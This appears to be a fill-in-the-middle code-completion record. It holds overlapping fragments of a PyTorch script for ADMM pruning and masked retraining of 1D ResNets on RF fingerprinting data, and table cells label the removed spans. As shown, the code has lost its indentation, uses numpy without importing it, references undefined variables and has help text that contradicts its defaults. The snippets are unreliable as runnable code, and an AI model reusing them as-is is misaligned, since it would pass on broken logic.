def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| masked_retrain | identifier_name |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
parser.add_argument('--combine-progressive', default=False, type=str2bool,
help="for filter pruning after column pruning")
parser.add_argument('--purification', default=False, type=str2bool,
help="purification after pruning")
parser.add_argument('--lr-scheduler', type=str, default='default',
help='define lr scheduler')
parser.add_argument('--warmup', action='store_true', default=False,
help='warm-up scheduler')
parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='M',
help='warmup-lr, smaller than original lr')
parser.add_argument('--warmup-epochs', type=int, default=0, metavar='M',
help='number of epochs for lr warmup')
parser.add_argument('--mixup', action='store_true', default=False,
help='ce mixup')
parser.add_argument('--alpha', type=float, default=0.0, metavar='M',
help='for mixup training, lambda = Beta(alpha, alpha) distribution. Set to 0.0 to disable')
parser.add_argument('--smooth', action='store_true', default=False,
help='lable smooth')
parser.add_argument('--smooth-eps', type=float, default=0.0, metavar='M',
help='smoothing rate [0.0, 1.0], set to 0.0 to disable')
parser.add_argument('--no-tricks', action='store_true', default=False,
help='disable all training tricks and restore original classic training process')
########### From RFMLS: multi-gpu; batch-size
parser.add_argument('--exp_name', default='exp1', type=str, help='Specify the experiment name')
parser.add_argument('--base_path', default='/scratch/RFMLS/dataset100/dataset_with_val_9000train/', type=str, help='Specify the base path')
parser.add_argument('--save_path', default='/scratch/zhou.fan1/filtered/', type=str, help='Specify the save path')
parser.add_argument('--file_type', default='mat', type=str, help='Specify type of file you want to read')
parser.add_argument('--decimated', default=False, type=str2bool, help='Specify if the data in the files is decimated, if so and you are using the same stats file as the undecimated then the generator will take this into account')
parser.add_argument('--val_from_train', default=False, type=str2bool, help='If validation not present in partition file, generate one from the training set. (If false, use test set as validation)')
parser.add_argument('--test_on_val_set',default=False, type=str2bool, help='If true it will test the trained model on validation data, for tuning hyperparameters')
parser.add_argument('--train', default=False, type=str2bool, help='Specify doing training or not')
parser.add_argument('-ss', '--slice_size', default=1024, type=int, help='Specify the slice size')
parser.add_argument('-d', '--devices', default=100, type=int, help='Specify the number of total devices')
parser.add_argument('--cnn_stack', default=3, type=int, help='[Baseline Model] Specify the number of cnn layers')
parser.add_argument('--fc_stack', default=2, type=int, help='[Baseline Model] Specify the number of fc layers')
parser.add_argument('--channels', default=128, type=int, help='[Baseline Model] Specify the number of channels of cnn')
parser.add_argument('--fc1', default=256, type=int, help='[Baseline Model] Specify the number of neurons in the first fc layer')
parser.add_argument('--fc2', default=128, type=int, help='[Baseline Model] Specify the number of neurons in the penultimate fc layer')
# Data Generator
parser.add_argument('--generator', default='new', type=str, help='Specify which generator to use')
parser.add_argument('--add_padding', default=False, type=str2bool, help='If examples are smaller than slice size addpadding')
parser.add_argument('--padding_type', default='zero', type=str, help='"zero"-padding and "stride"-padding')
parser.add_argument('--try_concat', default=False, type=str2bool, help='If examples are smaller than slice size and using demodulated data, try and concat them')
parser.add_argument('--preprocessor', default='no', type=str, help='Specify which preprocessor to use')
parser.add_argument('--K', default=1, type=int, help='Specify the batch down sampling factor K')
parser.add_argument('-fpio', '--files_per_IO', default=500000, type = int, help='Specify the files loaded to memory per IO')
parser.add_argument('--shrink', default=1, type=float, help='Dataset down sampling factor')
parser.add_argument('--normalize', default='True', type=str2bool, help='Specify if you want to normalize the data using mean and std in stats files (if stats does not have this info, it is ignored)')
parser.add_argument('--crop', default=0, type=int, help='if crop > 0 the generator crops the examples to a maximum length of crop')
parser.add_argument('--training_strategy', default='big', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--sampling', default='model', type=str, help='Specify which sampling strategy to use')
parser.add_argument('--fir_size', default=11, type=int, help='FIR filter size.')
parser.add_argument('--use_preamble', default=False, type=str2bool, help='Using preamble to train channel-removing filter')
parser.add_argument('--merge_preamble', default=False, type=str2bool, help='Merge preamble with slice to train channel-removing filter')
parser.add_argument('--id_gpu', default=0, type=int, help='If --multigpu=False, this arguments specify which gpu to use.')
parser.add_argument('--test_stride', default=16, type=int, help='Specify the stride to use for testing')
parser.add_argument('--per_example_strategy', default='prob_sum', type=str, help='Specify the strategy used to compute the per wxample accuracy: (majority, prob_sum, log_prob_sum, all)')
################## augmentation parameters #####################
parser.add_argument('--aug_var', default='0.0434', type=float, help='variance of noise for data augmentation')
parser.add_argument('--aug_mean', default='0.045', type=float, help='mean of noise for data augmentation')
parser.add_argument('--aug_taps', default=11, type=int, help='Number of complex taps for data augmentation')
parser.add_argument('--aug_granularity', default='per_ex', type=str, help='granularity of fir selection for training pipelinecan be per_ex, per_batch, per_slice')
args = parser.parse_args()
args.cuda = not args.no_cuda and torch.cuda.is_available()
if args.cuda:
torch.cuda.manual_seed(args.seed)
use_cuda = not args.no_cuda and torch.cuda.is_available()
device = torch.device("cuda:0" if use_cuda else "cpu")
kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}
writer = None
print('Use Cuda:',use_cuda)
# ------------------ save path ----------------------------------------------
args.save_path_exp = args.save_path
check_and_create(args.save_path_exp)
setting_file = os.path.join(args.save_path_exp, args.exp_name+'.config')
print("*************** Configuration ***************")
with open(setting_file, 'w') as f:
args_dic = vars(args)
for arg, value in args_dic.items():
line = arg + ' : ' + str(value)
print(line)
f.write(line+'\n')
### Data Loader ###
pipeline = TrainValTest(base_path=args.base_path, save_path=args.save_path_exp,
val_from_train=args.val_from_train)
pipeline.load_data(sampling=args.sampling)
train_loader = pipeline.GenerateData(args.batch_size, args.slice_size, args.K, args.files_per_IO,
generator_type=args.generator, processor_type=args.preprocessor,
training_strategy = args.training_strategy,
file_type=args.file_type, normalize=args.normalize,
decimated=args.decimated, add_padding=args.add_padding,
padding_type=args.padding_type, try_concat=args.try_concat,
crop=args.crop,
use_preamble=args.use_preamble, aug_var=args.aug_var,
aug_mean=args.aug_mean, aug_taps=args.aug_taps)
# set up model archetecture
if args.arch == "resnet":
if args.depth == 50:
model = ResNet50_1d(args.slice_size,args.devices)
if args.depth == 34:
model = ResNet34_1d(args.slice_size,args.devices)
if args.depth == 18:
model = ResNet18_1d(args.slice_size,args.devices)
print(model)
if args.multi_gpu:
model = torch.nn.DataParallel(model)
model.cuda()
if args.load_model:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name))
if args.train:
print('*************** Training Model ***************')
test_column_sparsity(model)
optimizer_init_lr = 0.0001
best_acc = 0
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
criterion = torch.nn.CrossEntropyLoss()
for epoch in range(1, 20):
start = time.time()
#adjust learning rate
lr = optimizer_init_lr * (0.5 ** (epoch // 3))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
model = pipeline.train_model(args, model, train_loader, criterion, optimizer, epoch)
end_train = time.time()
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
end_test = time.time()
print("Training time: {:.3f}; Testing time: {:.3f}; Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(end_train-start, end_test-end_train, acc_slice, acc_ex))
if acc_ex > best_acc:
best_acc = acc_ex
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/{}{}.pt".format(
args.arch, args.depth))
else:
print('*************** Not Training Model ***************')
acc_slice, acc_ex, preds = pipeline.test_model(args, model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, acc_ex))
test_column_sparsity(model)
test_filter_sparsity(model)
""" disable all bag of tricks"""
if args.no_tricks:
# disable all trick even if they are set to some value
args.lr_scheduler = "default"
args.warmup = False
args.mixup = False
args.smooth = False
args.alpha = 0.0
args.smooth_eps = 0.0
def main():
if (args.admm and args.masked_retrain):
raise ValueError("can't do both masked retrain and admm")
elif (not args.admm) and (not args.masked_retrain) and args.purification:
print("Model Purification")
post_column_prune(model,0.04)
post_filter_prune(model,0.23)
#acc_slice, acc_ex, preds = pipeline.test_model(args,model)
rate = test_filter_sparsity(model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}_{}.pt".format(acc_ex, rate))
sys.exit(1)
print("The config arguments showed as below:")
print(args)
""" bag of tricks set-ups"""
criterion = CrossEntropyLossMaybeSmooth(smooth_eps=args.smooth_eps).cuda()
args.smooth = args.smooth_eps > 0.0
args.mixup = args.alpha > 0.0
optimizer_init_lr = args.warmup_lr if args.warmup else args.lr
optimizer = None
if args.optmzr == 'sgd':
optimizer = torch.optim.SGD(model.parameters(), optimizer_init_lr, momentum=0.9, weight_decay=1e-4)
elif args.optmzr == 'adam':
optimizer = torch.optim.Adam(model.parameters(), optimizer_init_lr)
scheduler = None
if args.lr_scheduler == 'cosine':
scheduler = optim.lr_scheduler.CosineAnnealingLR(optimizer, T_max=args.epochs * len(train_loader), eta_min=4e-08)
elif args.lr_scheduler == 'default':
# my learning rate scheduler for cifar, following https://github.com/kuangliu/pytorch-cifar
epoch_milestones = [65, 100, 130, 190, 220, 250, 280]
"""Set the learning rate of each parameter group to the initial lr decayed
by gamma once the number of epoch reaches one of the milestones
"""
scheduler = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[i * len(train_loader) for i in epoch_milestones], gamma=0.5)
else:
raise Exception("unknown lr scheduler")
if args.warmup:
scheduler = GradualWarmupScheduler(optimizer, multiplier=args.lr / args.warmup_lr, total_iter=args.warmup_epochs * len(train_loader), after_scheduler=scheduler)
"""====================="""
""" multi-rho admm train"""
"""====================="""
initial_rho = args.rho
if args.admm:
admm_prune(initial_rho, criterion, optimizer, scheduler)
"""=============="""
"""masked retrain"""
"""=============="""
if args.masked_retrain:
masked_retrain(initial_rho, criterion, optimizer, scheduler)
def admm_prune(initial_rho, criterion, optimizer, scheduler):
for i in range(args.rho_num):
current_rho = initial_rho * 10 ** i
if i == 0:
original_model_name = args.load_model
print("\n>_ Loading baseline/progressive model..... {}\n".format(original_model_name))
model.load_state_dict(torch.load(original_model_name)) # admm train need basline model
else:
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho / 10, args.config_file, args.optmzr, args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=current_rho)
admm.admm_initialization(args, ADMM=ADMM, model=model) # intialize Z variable
# admm train
best_prec1 = 0.
for epoch in range(1, args.epochs + 1):
print("current rho: {}".format(current_rho))
train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
#t_loss, prec1 = test(model, criterion, test_loader)
acc_slice, acc_ex, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.3f}; Testing exp-acc: {:.3f}".format(acc_slice, acc_ex))
best_prec1 = max(acc_ex, best_prec1)
print("Best Acc: {:.4f}%".format(best_prec1))
print("Saving model...\n")
torch.save(model.state_dict(), args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, current_rho, args.config_file, args.optmzr, args.sparsity_type))
def masked_retrain(initial_rho, criterion, optimizer, scheduler):
if args.load_mask:
'''
Load pre-mask and added to the full model
'''
print("\n>_ Loading Mask: "+ args.load_mask)
mask = torch.load(args.load_mask)
for name, W in (model.named_parameters()):
if name in mask and W.shape==mask[name].shape:
weight = mask[name].cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W.data *= zero_mask
test_column_sparsity(model)
else:
print("\n>_ Loading file: "+args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type))
model.load_state_dict(torch.load(args.save_path_exp+"/prunned_{}{}_{}_{}_{}_{}.pt".format(
args.arch, args.depth, initial_rho * 10 ** (args.rho_num - 1), args.config_file, args.optmzr,
args.sparsity_type)))
model.cuda()
ADMM = admm.ADMM(model, file_name="./profile/" + args.config_file + ".yaml", rho=initial_rho)
print(ADMM.prune_ratios)
best_prec1 = [0]
admm.hard_prune(args, ADMM, model)
epoch_loss_dict = {}
testAcc = []
for epoch in range(1, args.epochs + 1):
idx_loss_dict = train(ADMM, train_loader, criterion, optimizer, scheduler, epoch, args)
acc_slice, prec1, preds = pipeline.test_model(args,model)
print("Testing slice-acc: {:.4f}; Testing exp-acc: {:.4f}".format(acc_slice, prec1))
#rate = test_filter_sparsity(model)
#t_loss, prec1 = test(model, criterion, test_loader)
if prec1 > max(best_prec1):
print("\n>_ Got better accuracy, saving model with accuracy {:.3f}% now...\n".format(prec1))
torch.save(model.state_dict(), args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
args.arch, args.depth, prec1, args.rho_num, args.config_file, args.sparsity_type))
print("\n>_ Deleting previous model file with accuracy {:.3f}% now...\n".format(max(best_prec1)))
#if len(best_prec1) > 1:
# os.remove(args.save_path_exp+"/retrained_{}{}_acc_{:.3f}_{}rhos_{}_{}.pt".format(
# args.arch, args.depth, max(best_prec1), args.rho_num, args.config_file, args.sparsity_type))
epoch_loss_dict[epoch] = idx_loss_dict
testAcc.append(prec1)
best_prec1.append(prec1)
print("current best acc is: {:.4f}".format(max(best_prec1)))
rate = test_column_sparsity(model)
rate = test_filter_sparsity(model)
print("Best Acc: {:.4f}%".format(max(best_prec1)))
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_plotable_{}.npy".format(args.sparsity_type)), epoch_loss_dict)
#np.save(strftime("./plotable/%m-%d-%Y-%H:%M_testAcc_{}.npy".format(args.sparsity_type)), testAcc)
def train(ADMM, train_loader,criterion, optimizer, scheduler, epoch, args):
batch_time = AverageMeter()
data_time = AverageMeter()
losses = AverageMeter()
top1 = AverageMeter()
idx_loss_dict = {}
# switch to train mode
model.train()
if args.masked_retrain and not args.combine_progressive:
print("full acc re-train masking")
masks = {}
for name, W in (model.named_parameters()):
# if name not in ADMM.prune_ratios:
# continue
# above_threshold, W = admm.weight_pruning(args, W, ADMM.prune_ratios[name])
# W.data = W
# masks[name] = above_threshold
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
elif args.combine_progressive:
print("progressive admm-train/re-train masking")
masks = {}
for name, W in (model.named_parameters()):
weight = W.cpu().detach().numpy()
non_zeros = weight != 0
non_zeros = non_zeros.astype(np.float32)
zero_mask = torch.from_numpy(non_zeros).cuda()
W = torch.from_numpy(weight).cuda()
W.data = W
masks[name] = zero_mask
end = time.time()
for i, (input, target) in enumerate(train_loader):
# measure data loading time
data_time.update(time.time() - end)
# adjust learning rate
if args.admm:
admm.admm_adjust_learning_rate(optimizer, epoch, args)
else:
scheduler.step()
input=input.float()
input = input.cuda(non_blocking=True)
target = target.cuda(non_blocking=True)
if args.mixup:
input, target_a, target_b, lam = mixup_data(input, target, args.alpha)
# compute output
output = model(input)
if args.mixup:
ce_loss = mixup_criterion(criterion, output, target_a, target_b, lam, args.smooth)
else:
ce_loss = criterion(output, target, smooth=args.smooth)
if args.admm:
admm.z_u_update(args, ADMM, model, device, train_loader, optimizer, epoch, input, i, writer) # update Z and U variables
ce_loss, admm_loss, mixed_loss = admm.append_admm_loss(args, ADMM, model, ce_loss) # append admm losss
# measure accuracy and record loss
acc1,_ = accuracy(output, target, topk=(1,5))
losses.update(ce_loss.item(), input.size(0))
top1.update(acc1[0], input.size(0))
# compute gradient and do SGD step
optimizer.zero_grad()
if args.admm:
mixed_loss.backward()
else:
ce_loss.backward()
if args.combine_progressive:
with torch.no_grad():
for name, W in (model.named_parameters()):
if name in masks:
W.grad *= masks[name]
if args.masked_retrain:
with torch.no_grad():
for name, W in (model.named_parameters()):
|
optimizer.step()
# measure elapsed time
batch_time.update(time.time() - end)
end = time.time()
# print(i)
if i % args.log_interval == 0:
for param_group in optimizer.param_groups:
current_lr = param_group['lr']
print('({0}) lr:[{1:.5f}] '
'Epoch: [{2}][{3}/{4}]\t'
'Status: admm-[{5}] retrain-[{6}]\t'
'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t'
'Loss {loss.val:.4f} ({loss.avg:.4f})\t'
'Acc@1 {top1.val:.3f}% ({top1.avg:.3f}%)\t'
.format(args.optmzr, current_lr,
epoch, i, len(train_loader), args.admm, args.masked_retrain, batch_time=data_time, loss=losses, top1=top1))
if i % 100 == 0:
idx_loss_dict[i] = losses.avg
return idx_loss_dict
def test(model, criterion, test_loader):
model.eval()
losses = AverageMeter()
correct = 0
with torch.no_grad():
for data, target in test_loader:
data, target = data.cuda(), target.cuda()
output = model(data)
loss = criterion(output, target)
losses.update(loss.item(), data.size(0))
# test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss
pred = output.max(1, keepdim=True)[1] # get the index of the max log-probability
correct += pred.eq(target.view_as(pred)).sum().item()
print('\nTest set loss: {:.4f}, * Acc@1: {}/{} ({:.2f}%)\n'.format(
losses.avg, correct, len(test_loader.dataset),
100. * float(correct) / float(len(test_loader.dataset))))
return losses.avg, (100. * float(correct) / float(len(test_loader.dataset)))
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def accuracy(output, target, topk=(1,)):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].view(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def convert_secs2time(epoch_time):
need_hour = int(epoch_time / 3600)
need_mins = int((epoch_time - 3600*need_hour) / 60)
need_secs = int(epoch_time - 3600*need_hour - 60*need_mins)
return need_hour, need_mins, need_secs
def adjust_learning_rate(optimizer, epoch, args):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = args.lr * (0.3 ** (epoch // args.lr_decay))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
if __name__ == '__main__':
start_time = time.time()
main()
duration = time.time() - start_time
need_hour, need_mins, need_secs = convert_secs2time(duration)
print('total runtime: {:02d}:{:02d}:{:02d}'.format(need_hour, need_mins, need_secs))
| if name in masks:
W.grad *= masks[name] | conditional_block |
main.py | from __future__ import print_function
import os
import sys
import logging
import argparse
import time
from time import strftime
import torch
import torch.optim as optim
from torchvision import datasets, transforms
from models.resnet_1d import ResNet18_1d, ResNet34_1d, ResNet50_1d
import admm
from admm import GradualWarmupScheduler
from admm import CrossEntropyLossMaybeSmooth
from admm import mixup_data, mixup_criterion
from testers import *
from TrainValTest import TrainValTest
def str2bool(v):
if v.lower() in ('yes', 'true', 't', 'y', '1'):
return True
elif v.lower() in ('no', 'false', 'f', 'n', '0'):
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def check_and_create(dir_path):
if os.path.exists(dir_path):
return True
else:
os.makedirs(dir_path)
return False
# Training settings
parser = argparse.ArgumentParser(description='PyTorch CIFAR10 admm training')
parser.add_argument('--logger', action='store_true', default=True,
help='whether to use logger')
parser.add_argument('--arch', type=str, default=None,
help='[vgg, resnet, convnet, alexnet]')
parser.add_argument('--depth', default=None, type=int,
help='depth of the neural network, 16,19 for vgg; 18, 50 for resnet')
parser.add_argument('--s', type=float, default=0.0001,
help='scale sparse rate (default: 0.0001)')
parser.add_argument('-j', '--workers', default=4, type=int, metavar='N',
help='number of data loading workers (default: 4)')
parser.add_argument('--multi-gpu', action='store_true', default=False,
help='for multi-gpu training')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--test-batch-size', type=int, default=256, metavar='N',
help='input batch size for testing (default: 256)')
parser.add_argument('--epochs', type=int, default=100, metavar='N',
help='number of epochs to train (default: 160)')
parser.add_argument('--admm-epochs', type=int, default=1, metavar='N',
help='number of interval epochs to update admm (default: 1)')
parser.add_argument('--optmzr', type=str, default='sgd', metavar='OPTMZR',
help='optimizer used (default: adam)')
parser.add_argument('--lr', type=float, default=0.001, metavar='LR',
help='learning rate (default: 0.1)')
parser.add_argument('--lr-decay', type=int, default=30, metavar='LR_decay',
help='how many every epoch before lr drop (default: 30)')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('--no-cuda', action='store_true', default=False,
help='disables CUDA training')
parser.add_argument('--seed', type=int, default=1, metavar='S',
help='random seed (default: 1)')
parser.add_argument('--log-interval', type=int, default=100, metavar='N',
help='how many batches to wait before logging training status')
parser.add_argument('--load-model', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--load-mask', type=str, default="",
help='For loading the exist Model')
parser.add_argument('--save-model', type=str, default="",
help='For Saving the current Model')
parser.add_argument('--masked-retrain', action='store_true', default=False,
help='for masked retrain')
parser.add_argument('--verbose', action='store_true', default=True,
help='whether to report admm convergence condition')
parser.add_argument('--admm', action='store_true', default=False,
help="for admm training")
parser.add_argument('--rho', type=float, default = 0.0001,
help ="define rho for ADMM")
parser.add_argument('--rho-num', type=int, default = 5,
help ="define how many rohs for ADMM training")
parser.add_argument('--sparsity-type', type=str, default='random-pattern',
help ="define sparsity_type: [irregular,column,filter,pattern,random-pattern]")
parser.add_argument('--config-file', type=str, default='config_vgg16',
help ="config file name")
